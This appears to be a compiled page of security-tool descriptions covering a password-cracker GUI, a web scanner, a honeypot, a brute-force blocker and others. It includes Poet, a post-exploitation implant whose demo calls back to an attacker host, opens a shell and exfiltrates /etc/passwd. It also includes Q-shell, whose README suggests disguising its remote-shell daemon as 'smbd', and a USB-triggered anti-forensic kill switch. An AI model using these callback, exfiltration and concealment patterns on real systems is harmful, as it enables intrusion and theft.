Johnny - GUI for John the Ripper

Johnny is a cross-platform open-source GUI for the popular password cracker John the Ripper.

Features

1. user could start, pause and resume attack (though only one session is allowed globally),
2. all attack related options work,
3. all input file formats are supported (pure hashes, pwdump, passwd, mixed),
4. ability to resume any previously started session via session history,
5. suggest the format of each hashes,
6. try lucky guesses with password guessing feature,
7. “smart” default options,
8. accurate output of cracked passwords,
9. config is stored in .conf file (~/.john/johnny.conf),
10. nice error messages and other user friendly things,
11. export of cracked passwords through clipboard,
12. export works with office suits (tested with LibreOffice Calc),
13. available in english and french,
14. allows you to set environment variables for each session directly in Johnny

Download  Johnny

Read More

Q-shell - Quick Shell for Unix Administrator

q-shell is quick shell for remote login into Unix system, it use blowfish crypt algorithm to protect transport data from client to server, you can get two program: 'qsh' for client, and 'qshd' for server, those program can rename by any name with you prefer.

Compile

Just enter 'make' and it will automation to compile, but, you must input the server key.

Usage

1. server:
   Just run qshd on server:
   

      $ ./qshd
   

   But, you would like to run after change it to other name, such as:
   

      $ mv qshd smbd
      $ export PATH=.:$PATH
      $ smbd
   

2. client:
   Set some environment variable, then run qsh:
   

     $ export _IP=127.0.0.1
     $ export _PORT=2800
     $ unset _P
     $ ./qsh shell
   

   Now you already login into server $_IP .

More function

q-shell include more function to manage system:

1. put/get files:
   

   $ ./qsh get /path/to/server/file .
   $ ./qsh put /path/to/local/file  /path/to/server/file
   

2. run a command on server:
   

   $ ./qsh exec 'ls -l /bin'
   

3. update server program:
   

   $ ./qsh update /path/to/local/qshd
   

   This function will update remote qshd, and run again.
4. automation to run command on many server:
   

   $ for i in {10..20} ; do \
         export _IP=192.168.0.$i
         export _PORT=2800
         export _P=key   # set key
         ./qsh exec 'ls -l /bin'
     done
   

   Note: qsh use $_P to fetch server key, so you should erase all history data after to use $_P.
5. update password
   start with version 3.2, you can update the password as below:
   

     $ ./qsh passwd
   

Download Q-shell

Read More

Nikto2 - Web Server Scanner

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.

Nikto is not designed as a stealthy tool. It will test a web server in the quickest time possible, and is obvious in log files or to an IPS/IDS. However, there is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS system).

Not every check is a security problem, though most are. There are some items that are "info only" type checks that look for things that may not have a security flaw, but the webmaster or security engineer may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files.

Features

Here are some of the major features of Nikto. See the documentation for a full list of features and how to use them.

• SSL Support (Unix with OpenSSL or maybe Windows with ActiveState's Perl/NetSSL)
• Full HTTP proxy support
• Checks for outdated server components
• Save reports in plain text, XML, HTML, NBE or CSV
• Template engine to easily customize reports
• Scan multiple ports on a server, or multiple servers via input file (including nmap output)
• LibWhisker's IDS encoding techniques
• Easily updated via command line
• Identifies installed software via headers, favicons and files
• Host authentication with Basic and NTLM
• Subdomain guessing
• Apache and cgiwrap username enumeration
• Mutation techniques to "fish" for content on web servers
• Scan tuning to include or exclude entire classes of vulnerability checks
• Guess credentials for authorization realms (including many default id/pw combos)
• Authorization guessing handles any directory, not just the root directory
• Enhanced false positive reduction via multiple methods: headers, page content, and content hashing
• Reports "unusual" headers seen
• Interactive status, pause and changes to verbosity settings
• Save full request/response for positive tests
• Replay saved positive requests
• Maximum execution time per target
• Auto-pause at a specified time
• Checks for common "parking" sites
• Logging to Metasploit
• Thorough documentation

Basic usage

   Options:
       -ask+               Whether to ask about submitting updates
                               yes   Ask about each (default)
                               no    Don't ask, don't send
                               auto  Don't ask, just send
       -Cgidirs+           Scan these CGI dirs: "none", "all", or values like "/cgi/ /cgi-a/"
       -config+            Use this config file
       -Display+           Turn on/off display outputs:
                               1     Show redirects
                               2     Show cookies received
                               3     Show all 200/OK responses
                               4     Show URLs which require authentication
                               D     Debug output
                               E     Display all HTTP errors
                               P     Print progress to STDOUT
                               S     Scrub output of IPs and hostnames
                               V     Verbose output
       -dbcheck           Check database and other key files for syntax errors
       -evasion+          Encoding technique:
                               1     Random URI encoding (non-UTF8)
                               2     Directory self-reference (/./)
                               3     Premature URL ending
                               4     Prepend long random string
                               5     Fake parameter
                               6     TAB as request spacer
                               7     Change the case of the URL
                               8     Use Windows directory separator (\)
                               A     Use a carriage return (0x0d) as a request spacer
                               B     Use binary value 0x0b as a request spacer
        -Format+           Save file (-o) format:
                               csv   Comma-separated-value
                               htm   HTML Format
                               msf+  Log to Metasploit
                               nbe   Nessus NBE format
                               txt   Plain text
                               xml   XML Format
                               (if not specified the format will be taken from the file extension passed to -output)
       -Help              Extended help information
       -host+             Target host
       -IgnoreCode        Ignore Codes--treat as negative responses
       -id+               Host authentication to use, format is id:pass or id:pass:realm
       -key+              Client certificate key file
       -list-plugins      List all available plugins, perform no testing
       -maxtime+          Maximum testing time per host
       -mutate+           Guess additional file names:
                               1     Test all files with all root directories
                               2     Guess for password file names
                               3     Enumerate user names via Apache (/~user type requests)
                               4     Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
                               5     Attempt to brute force sub-domain names, assume that the host name is the parent domain
                               6     Attempt to guess directory names from the supplied dictionary file
       -mutate-options    Provide information for mutates
       -nointeractive     Disables interactive features
       -nolookup          Disables DNS lookups
       -nossl             Disables the use of SSL
       -no404             Disables nikto attempting to guess a 404 page
       -output+           Write output to this file ('.' for auto-name)
       -Pause+            Pause between tests (seconds, integer or float)
       -Plugins+          List of plugins to run (default: ALL)
       -port+             Port to use (default 80)
       -RSAcert+          Client certificate file
       -root+             Prepend root value to all requests, format is /directory
       -Save              Save positive responses to this directory ('.' for auto-name)
       -ssl               Force ssl mode on port
       -Tuning+           Scan tuning:
                               1     Interesting File / Seen in logs
                               2     Misconfiguration / Default File
                               3     Information Disclosure
                               4     Injection (XSS/Script/HTML)
                               5     Remote File Retrieval - Inside Web Root
                               6     Denial of Service
                               7     Remote File Retrieval - Server Wide
                               8     Command Execution / Remote Shell
                               9     SQL Injection
                               0     File Upload
                               a     Authentication Bypass
                               b     Software Identification
                               c     Remote Source Inclusion
                               x     Reverse Tuning Options (i.e., include all except specified)
       -timeout+          Timeout for requests (default 10 seconds)
       -Userdbs           Load only user databases, not the standard databases
                               all   Disable standard dbs and load only user dbs
                               tests Disable only db_tests and load udb_tests
       -until             Run until the specified time or duration
       -update            Update databases and plugins from CIRT.net
       -useproxy          Use the proxy defined in nikto.conf
       -Version           Print plugin and database versions
       -vhost+            Virtual host (for Host header)
              + requires a value

Basic Testing

The most basic Nikto scan requires simply a host to target, since port 80 is assumed if none is specified. The host can either be an IP or a hostname of a machine, and is specified using the -h (-host) option. This will scan the IP 192.168.0.1 on TCP port 80:

perl nikto.pl -h 192.168.0.1

To check on a different port, specify the port number with the -p (-port) option. This will scan the IP 192.168.0.1 on TCP port 443:

perl nikto.pl -h 192.168.0.1 -p 443

Hosts, ports and protocols may also be specified by using a full URL syntax, and it will be scanned:

perl nikto.pl -h https://192.168.0.1:443/

There is no need to specify that port 443 may be SSL, as Nikto will first test regular HTTP and if that fails, HTTPS. If you are sure it is an SSL server, specifying -s (-ssl) will speed up the test.

perl nikto.pl -h 192.168.0.1 -p 443 -ssl

More complex tests can be performed using the -mutate parameter, as detailed later. This can produce extra tests, some of which may be provided with extra parameters through the -mutate-options parameter. For example, using -mutate 3, with or without a file attempts to brute force usernames if the web server allows ~user URIs:

perl nikto.pl -h 192.168.0.1 -mutate 3 -mutate-options user-list.txt

Multiple Port Testing

Nikto can scan multiple ports in the same scanning session. To test more than one port on the same host, specify the list of ports in the -p (-port) option. Ports can be specified as a range (i.e., 80-90), or as a comma-delimited list, (i.e., 80,88,90). This will scan the host on ports 80, 88 and 443.

perl nikto.pl -h 192.168.0.1 -p 80,88,443

Download Nikto2

Read More

Cowrie - SSH Honeypot

Cowrie is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.

Cowrie is directly based on Kippo by Upi Tamminen (desaster).

Features

Some interesting features:

• Fake filesystem with the ability to add/remove files. A full fake filesystem resembling a Debian 5.0 installation is included
• Possibility of adding fake file contents so the attacker can 'cat' files such as /etc/passwd. Only minimal file contents are included
• Session logs stored in an UML Compatible format for easy replay with original timings
• Cowrie saves files downloaded with wget/curl or uploaded with SFTP and scp for later inspection

Additional functionality over standard kippo:

• SFTP and SCP support for file upload
• Support for SSH exec commands
• Logging of direct-tcp connection attempts (ssh proxying)
• Logging in JSON format for easy processing in log management solutions
• Many, many additional commands

Requirements

Software required:

• An operating system (tested on Debian, CentOS, FreeBSD and Windows 7)
• Python 2.5+
• Twisted 8.0+
• PyCrypto
• pyasn1
• Zope Interface

Files of interest:

• dl/ - files downloaded with wget are stored here
• log/cowrie.log - log/debug output
• log/cowrie.json - transaction output in JSON format
• log/tty/ - session logs
• utils/playlog.py - utility to replay session logs
• utils/createfs.py - used to create fs.pickle
• data/fs.pickle - fake filesystem
• honeyfs/ - file contents for the fake filesystem - feel free to copy a real system here

Download Cowrie

Read More

USBkill - Anti-Forensic Kill-Switch that waits for a change on your USB ports

USBkill is an anti-forensic kill-switch that waits for a change on your USB ports and then immediately shuts down your computer.

To run:

sudo python usbkill.py

Why?

Some reasons to use this tool:

• In case the police or other thugs come busting in (or steal your laptop from you when you are at a public library as happened to Ross). The police commonly uses a "mouse jiggler" to keep the screensaver and sleep mode from activating.
• You don’t want someone retrieve documents (such as private keys) from your computer or install malware/backdoors via USB.
• You want to improve the security of your (Full Disk Encrypted) home or corporate server (e.g. Your Raspberry).

[!] Important: Make sure to use (partial) disk encryption! Otherwise they will get in anyway.

Tip: Additionally, you may use a cord to attach a USB key to your wrist. Then insert the key into your computer and start usbkill. If they steal your computer, the USB will be removed and the computer shuts down immediately.

Feature List

(version 1.0-rc.2)

• Compatible with Linux, *BSD and OS X.
• Shutdown the computer when there is USB activity.
• Customizable. Define which commands should be executed just before shut down.
• Ability to whitelist a USB device.
• Ability to change the check interval (default: 250ms).
• Ability to melt the program on shut down.
• Works with sleep mode (OS X).
• No dependency except srm. sudo apt-get install secure-delete
• Sensible defaults

Supported command line arguments (mainly for devs):

• --no-shut-down: Execute all the (destructive) commands you defined in settings.ini, but don’t turn off the computer.
• --cs: Copy program folder settings.ini to /etc/usbkill/settings.ini

Download USBkill

Read More

Sentry - Bruteforce Attack Blocker (ssh, FTP, SMTP, and more)

Sentry detects and prevents bruteforce attacks against sshd using minimal system resources.

SAFE

To prevent inadvertant lockouts, Sentry manages a whitelist of IPs that have connected more than 3 times and succeeded at least once. Never again will that forgetful colleague behind the office NAT router get us locked out of our system. Nor the admin whose script just failed to login 12 times in 2 seconds.

Sentry includes support for adding IPs to a firewall. Support for IPFW, PF, ipchains is included. Firewall support is disabled by default. This is because firewall rules may terminate existing session(s) to the host (attn IPFW users). Get your IPs whitelisted (connect 3x or use --whitelist) before enabling the firewall option.

SIMPLE

Sentry has an extremely simple database for tracking IPs. This makes it very easy for administrators to view and manipulate the database using shell commands and scripts. See the EXAMPLES section.

Sentry is written in perl, which is installed everywhere you find sshd. It has no dependencies. Installation and deployment is extremely simple.

FLEXIBLE

Sentry supports blocking connection attempts using tcpwrappers and several popular firewalls. It is easy to extend sentry to support additional blocking lists.

Sentry was written to protect the SSH daemon but anticipates use with other daemons. SMTP support is planned. As this was written, the primary attack platform in use is bot nets comprised of exploited PCs on high-speed internet connections. These bots are used for carrying out SSH attacks as well as spam delivery. Blocking bots prevents multiple attack vectors.

The programming style of sentry makes it easy to insert code for additonal functionality.

EFFICIENT

The primary goal of Sentry is to minimize the resources an attacker can steal, while consuming minimal resources itself. Most bruteforce blocking apps (denyhosts, fail2ban, sshdfilter) expect to run as a daemon, tailing a log file. That requires a language interpreter to always be running, consuming at least 10MB of RAM. A single hardware node with dozens of virtual servers will lose hundreds of megs to daemon protection.

Sentry uses resources only when connections are made. The worse case scenario is the first connection made by an IP, since it will invoke a perl interpreter. For most connections, Sentry will append a timestamp to a file, stat for the presense of another file and exit.

Once an IP is blacklisted for abuse, whether by tcpd or a firewall, the resources it can consume are practically zero.

Sentry is not particularly efficient for reporting. The "one file per IP" is superbly minimal for logging and blacklisting, but nearly any database would perform better for reporting. Expect to wait a few seconds for sentry --report.

REQUIRED ARGUMENTS

• ip
  An IPv4 address. The IP should come from a reliable source that is difficult to spoof. Tcpwrappers is an excellent source. UDP connections are a poor source as they are easily spoofed. The log files of TCP daemons can be good source if they are parsed carefully to avoid log injection attacks.

All actions except report and help require an IP address. The IP address can be manually specified by an administrator, or preferably passed in by a TCP server such as tcpd (tcpwrappers), inetd, or tcpserver (daemontools).

ACTIONS

• blacklist
  deny all future connections
• whitelist
  whitelist all future connections, remove the IP from the blacklists, and make it immune to future connection tests.
• delist
  remove an IP from the white and blacklists. This is useful for testing that sentry is working as expected.
• connect
  register a connection by an IP. The connect method will log the attempt and the time. See CONNECT.
• update
  Check the most recent version of sentry against the installed version and update if a newer version is available.

EXAMPLES

IP REPORT

$ /var/db/sentry/sentry.pl -r --ip=24.19.45.95
   9 connections from 24.19.45.95
       and it is whitelisted

HOME GATEWAY REPORT

$ /var/db/sentry/sentry.pl -r
  -------- summary ---------
  1614 unique IPs have connected 76525 times
  1044 IPs are blacklisted
    18 IPs are whitelisted

WEB SERVER REPORT

$ /var/db/sentry/sentry.pl -r
 -------- summary ---------
 1240 unique IPs have connected 285554 times
   40 IPs are blacklisted
    4 IPs are whitelisted

EUROPEAN DNS MIRROR

$ /var/db/sentry/sentry.pl -r
-------- summary ---------
3484 unique IPs have connected 15391 times
1127 IPs are blacklisted
   6 IPs are whitelisted

Download Sentry

Read More

Squert - A Simple QUEry and Report Tool

Squert is a web application that is used to query and view event data stored in a Sguil database (typically IDS alert data). Squert is a visual tool that attempts to provide additional context to events through the use of metadata, time series representations and weighted and logically grouped result sets. The hope is that these views will prompt questions that otherwise may not have been asked.

Intro Video:

 

Requirements

• Sguil 0.9.0 http://sguil.net. If you use Security Onion http://securityonion.blogspot.ca you can get everything setup rather quickly.
• PHP55 with CLI
  • mysql
• TCL, TclX
  • mysqltcl
  • uri
  • ftp
  • ftp::geturl
  • md5
• MySQL client

Download  Squert

Read More

SQLMAP-Web-GUI - Web GUI to drive near full functionality of SQLMAP

PHP Frontend to work with the SQLMAP JSON API Server (sqlmapapi.py) to allow for a Web GUI to drive near full functionality of SQLMAP!

Here is a few quick videos to show that almost all of your usual SQLMAP command line functionality is still possible via this Web GUI.

Demo against: Windows 2003 Server, IIS/6.0 + ASP + MS-SQL 2005

Demo against: Linux (CentOS), Apache, MySQL, PHP

Requirements:

• Linux, Apache, PHP (check your favorite distro's wiki or forum pages, or use google)
  • PHP 5.3+ is suggested, older versions not tests so mileage may vary
• Python and any SQLMAP dependencies (refer to their wiki for any help there)
• Clone this repo to your machine
• Edit the sqlmap/inc/config.php file so the paths all point to the right locations on your system
• Copy the entire sqlmap/ directory and contents to your web root directory (cd SQLMAP-Web-GUI && cp -R sqlmap/ /var/www/)
• When you want to use, simply fire up the sqlmap API server (python /home/user/tools/sqlmap/sqlmapapi.py -s)
• Then you can navigate to the Web GUI address in your Browser to begin (firefox http://127.0.0.1/sqlmap/index.php)

Download SQLMAP-Web-GUI

Read More

Poet - A simple Post-Exploitation Tool

The client program runs on the target machine and is configured with an IP address (the server) to connect to and a frequency to connect at. If the server isn't running when the client tries to connect, the client quietly sleeps and tries again at the next interval. If the server is running however, the attacker gets a control shell to control the client and perform various actions on the target including:

• reconnaissance
• remote shell
• file exfiltration
• download and execute
• self destruct

Getting started

Go to the releases page and download the latest poet-client and poet-server files available.
Then skip to the Usage section below.
Alternatively, you can build Poet yourself (it's pretty easy). Make sure you have the python2.7 and zip executables available.

$ git clone https://github.com/mossberg/poet
$ cd poet
$ make

This will create a bin/ directory which contains poet-clientand poet-server.

Usage

Poet is super easy to use, and requires nothing more than the Python (2.7) standard library. To easily try it out, a typical invocation would look like:

Terminal 1:

$ ./poet-client -v 127.0.0.1 1

Terminal 2:

$ sudo ./poet-server

Note: By default, the server needs to be run as root (using sudo) because the default port it binds to is 443. If that makes you uncomfortable, simply omit sudo and use the -p <PORT> flag on both the client and server. Pick a nice, high number for your port (> 1024).

Of course, using the -h flag gives you the full usage.

$ ./poet-client -h
usage: poet-client [-h] [-p PORT] [-v] [-d] IP [INTERVAL]

positional arguments:
  IP                    server
  INTERVAL              (s)

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT
  -v, --verbose
  -d, --delete          delete client upon execution

$ ./poet-server -h
usage: poet-server [-h] [-p PORT]

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT

Demo

This is just a small sample of what poet can do.

The scenario is, an attacker has gotten access to the victim's machine and downloaded and executed the client (in verbose mode ;). He/she does not have the server running at this point, but it's ok, the client waits patiently. Eventually the attacker is ready and starts the server, first starting a shell and executing uname -a, then exfiltrating /etc/passwd. Then he/she exits and detaches from the client, which continues running on the target waiting for the next opportunity to connect to the server.

Victim's Machine (5.4.3.2):

$ ./poet-client -v 1.2.3.4 10
[+] Poet started with interval of 10 seconds to port 443. Ctrl-c to exit.
[!] (2015-03-27 03:40:12.259676) Server is inactive
[!] (2015-03-27 03:40:22.263161) Server is inactive
[!] (2015-03-27 03:40:32.267308) Server is inactive
[+] (2015-03-27 03:40:42.273376) Server is active
[!] (2015-03-27 03:41:07.145979) Server is inactive
[!] (2015-03-27 03:41:17.150634) Server is inactive
[!] (2015-03-27 03:41:27.155614) Server is inactive
[!] (2015-03-27 03:41:37.160440) Server is inactive

Attacker's Machine (1.2.3.4):

# ./poet-server
                          _
        ____  ____  ___  / /_
       / __ \/ __ \/ _ \/ __/
      / /_/ / /_/ /  __/ /
     / .___/\____/\___/\__/
    /_/

[+] Poet server started on 443.
[+] (2015-03-27 03:40:42.272601) Connected By: ('5.4.3.2', 59309) -> VALID
[+] (2015-03-27 03:40:42.273087) Entering control shell
Welcome to psh, the Poet shell!
Running `help' will give you a list of supported commands.
psh > shell
psh > user@server $ uname -a
Linux lolServer 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed May 07 16:19:23 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
psh > user@server $ ^D
psh > exfil /etc/passwd
psh : exfil written to archive/20150327/exfil/passwd-201503274054.txt
psh > help
Commands:
  chint
  dlexec
  exec
  exfil
  exit
  help
  recon
  selfdestruct
  shell
psh > exit
[+] (2015-03-27 03:40:57.144083) Exiting control shell.
[-] (2015-03-27 03:40:57.144149) Poet server terminated.

Download Poet

Read More